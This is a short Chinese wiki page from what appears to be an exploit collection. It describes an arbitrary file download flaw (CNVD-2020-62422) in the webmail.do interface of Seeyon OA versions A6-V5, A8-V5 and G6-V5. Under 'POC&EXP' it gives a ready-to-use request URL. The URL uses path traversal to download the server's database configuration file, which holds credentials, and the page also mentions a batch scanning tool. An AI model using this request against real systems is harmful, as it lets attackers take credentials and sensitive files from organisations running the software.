menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right [+] 协同办公OA系统 chevron_right Seeyon-致远OA chevron_right 任意文件下载(CNVD-2020-62422)
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    漏洞概述

    致远OA的webmail.do接口存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息

    影响范围

    A6-V5
A8-V5
G6-V5
影响范围极广泛

    POC&EXP

    验证POC-下载数据库配置文件

    http://xxx.com/seeyon/webmail.do?method=doDownloadAtt&filename=data.txt&filePath=../conf/datasourceCtp.properties

    批量POC

    大宝剑(已同步)